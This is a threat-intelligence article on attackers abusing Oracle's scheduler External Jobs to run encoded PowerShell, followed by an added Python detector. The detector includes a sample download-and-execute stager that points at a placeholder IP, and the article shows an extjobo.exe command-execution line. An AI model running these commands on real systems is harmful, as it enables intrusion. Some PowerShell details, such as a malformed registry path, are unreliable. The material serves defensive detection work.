In recent weeks, security researchers have observed a surge in attacks exploiting Oracle Database Scheduler’s External Jobs feature to gain a foothold in corporate environments.
This technique abuses the scheduler’s ability to execute arbitrary commands on Windows-based database servers, allowing adversaries to bypass perimeter defenses.
Initial intrusion vectors involve probing publicly exposed Oracle listener ports and leveraging misconfigured credentials or default administrative accounts.
Once connected, attackers can invoke the extjobo.exe component to run commands with the same privileges as the OracleJobScheduler service.
The impact of this technique has been significant. Organizations that segmented their networks and isolated database servers were still compromised due to the inherent trust placed in the database scheduler process.
In one incident, threat actors established encrypted tunnels to external Command & Control (C2) servers, created local administrative accounts, and deployed ransomware under the guise of standard database operations.
Event logs reveal multiple failed login attempts followed by a successful SYSDBA connection, indicating credential harvesting or brute-force tactics preceding command execution.
Yarix analysts noted that, following credential acquisition, the adversaries leveraged Oracle DBS External Jobs to spawn encoded PowerShell processes. This behavior highlights a shift towards living-off-the-land techniques that avoid dropping custom executables on disk.
Instead, the attackers handed Base64-encoded scripts straight to PowerShell through extjobo.exe, which complicates detection and helps evade endpoint defenses.
In one case, the attacker executed a command to gather system information before downloading the payload. The decoded script (PowerShell's -EncodedCommand takes Base64 of the UTF-16LE script text) is shown below:
$cpu = Get-CimInstance -ClassName Win32_Processor
$ram = Get-CimInstance -ClassName Win32_ComputerSystem
Write-Host $cpu.Name, $cpu.NumberOfLogicalProcessors, [math]::Round($ram.TotalPhysicalMemory/1GB,2)
Get-PSDrive -PSProvider FileSystem
Get-WmiObject -Class Win32_OperatingSystem | Select-String 'OS Name'
Get-ItemProperty -Path HKLM:Server-Tcp -Name PortNumber
Infection Mechanism via External Jobs
The Oracle Database Scheduler’s External Jobs feature was designed to allow database administrators to run operating-system commands for maintenance tasks.
However, threat actors have discovered that any user with scheduler privileges can connect to the named pipe used by extjobo.exe and inject commands of their choosing. In the observed attacks, adversaries first authenticated as SYSDBA, then invoked:
extjobo.exe -noservice -exec C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand JABjAD0AbgBl…
The -EncodedCommand switch hands PowerShell a Base64-encoded (UTF-16LE) script that runs directly in memory without ever being written to disk; combined with -ep Bypass, it also sidesteps the script execution policy.
The scheduler listens on a named pipe that is typically accessible to the ORACLEDBS service account, so anyone who can reach it obtains command execution under that account. The resulting processes are children of the scheduler's service process rather than of the attacker's database session, which is why monitoring that watches only the database process or interactive logons does not see them.
Following initial reconnaissance, the attackers used similar commands to download secondary payloads from C2 servers, establish reverse shells, and create a local account named Admine for persistence and lateral movement.
By abusing legitimate scheduler functionality, the adversaries avoid writing executable artifacts to disk and rely on native Windows tools for reconnaissance, payload staging, and tunneling.
Logs confirm that after each execution the attackers deleted temporary batch files and scheduler jobs, further hindering forensic analysis.
This technique underscores the need for tighter access controls on scheduler privileges (CREATE EXTERNAL JOB and CREATE ANY JOB in particular), vigilant monitoring of named-pipe activity, and anomaly detection for unusual extjobo.exe invocations and the processes it spawns in Oracle database environments.
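As an added example (not code from the article, from Yarix or from Oracle), the following Python triage routine covers both the infection mechanism described above and the detection it calls for: it shows what a scheduler-spawned PowerShell invocation looks like in a process-creation record, decodes the UTF-16LE Base64 -EncodedCommand argument, and flags the pattern. The event layout, the Oracle install path, the watch-list of native tools, the payload indicators and the sample records are all constructed assumptions for the demonstration.

```python
"""Triage process-creation records for Oracle external-job abuse.

Added example: models the signals the article describes, namely a native tool
spawned by extjobo.exe and a Base64 (UTF-16LE) -EncodedCommand payload passed
to PowerShell. Event format, paths and samples are assumptions, not telemetry.
"""
import base64
import binascii
import re

# Native tools an attacker living off the land is likely to run from a job.
# Assumed watch-list; extend to taste.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe", "bitsadmin.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "net.exe", "net1.exe",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
# -ep and -exec resolve to -ExecutionPolicy, so only true prefixes are listed.
ENCODED_RE = re.compile(
    r"(?<!\S)[-/](?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)"
    r"\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)

# Strings in a decoded script that justify escalation; assumed indicators.
PAYLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex",
                 "invoke-expression", "net.sockets.tcpclient", "net user",
                 "net localgroup", "frombase64string")


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def encode_command(script):
    """Build the argument PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(event):
    """Return reason strings for one record; [] when nothing ties it to the scheduler."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"]
    if "extjobo.exe" not in (parent, image):
        return []  # PowerShell started elsewhere is out of scope for this rule
    reasons = []
    if parent == "extjobo.exe" and image in LOLBINS:
        reasons.append(f"extjobo.exe spawned {image}")
    if image == "extjobo.exe":
        m = re.search(r"(?<!\S)-exec\s+(\S+)", cmd, re.IGNORECASE)
        if m:
            reasons.append(f"extjobo.exe invoked with -exec {basename(m.group(1))}")
    script = decode_command(cmd)
    if script is not None:
        reasons.append("encoded PowerShell command")
        hits = [h for h in PAYLOAD_HINTS if h in script.lower()]
        if hits:
            reasons.append("payload indicators: " + ", ".join(hits))
    return reasons


# Constructed sample records (assumed install path, documentation-range IP).
ORACLE_BIN = r"C:\oracle\product\19c\dbhome_1\bin"
SYS32 = r"C:\Windows\System32"
RECON = "$cpu = Get-CimInstance -ClassName Win32_Processor; Write-Host $cpu.Name"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
SAMPLE_EVENTS = [
    {   # reconnaissance run through the scheduler
        "parent_image": ORACLE_BIN + r"\extjobo.exe",
        "image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -EncodedCommand " + encode_command(RECON),
    },
    {   # second-stage download staged the same way, with -ep Bypass
        "parent_image": ORACLE_BIN + r"\extjobo.exe",
        "image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -ep Bypass -enc " + encode_command(STAGER),
    },
    {   # the scheduler helper itself being handed a command to run
        "parent_image": ORACLE_BIN + r"\extjob.exe",
        "image": ORACLE_BIN + r"\extjobo.exe",
        "command_line": "extjobo.exe -noservice -exec " + SYS32 + r"\cmd.exe /c whoami",
    },
    {   # an administrator's interactive PowerShell: no finding
        "parent_image": SYS32 + r"\explorer.exe",
        "image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\scripts\backup.ps1",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["image"]), "->", triage(ev) or "no finding")
```

The rule deliberately ignores encoded commands that are not tied to extjobo.exe, so routine administrative PowerShell does not flood the queue; in production, feed it parsed Sysmon Event ID 1 or Windows 4688 records (with command-line auditing enabled) and keep the decoded script alongside the alert, since the Base64 argument is what the attacker relies on to hide the recon and download logic.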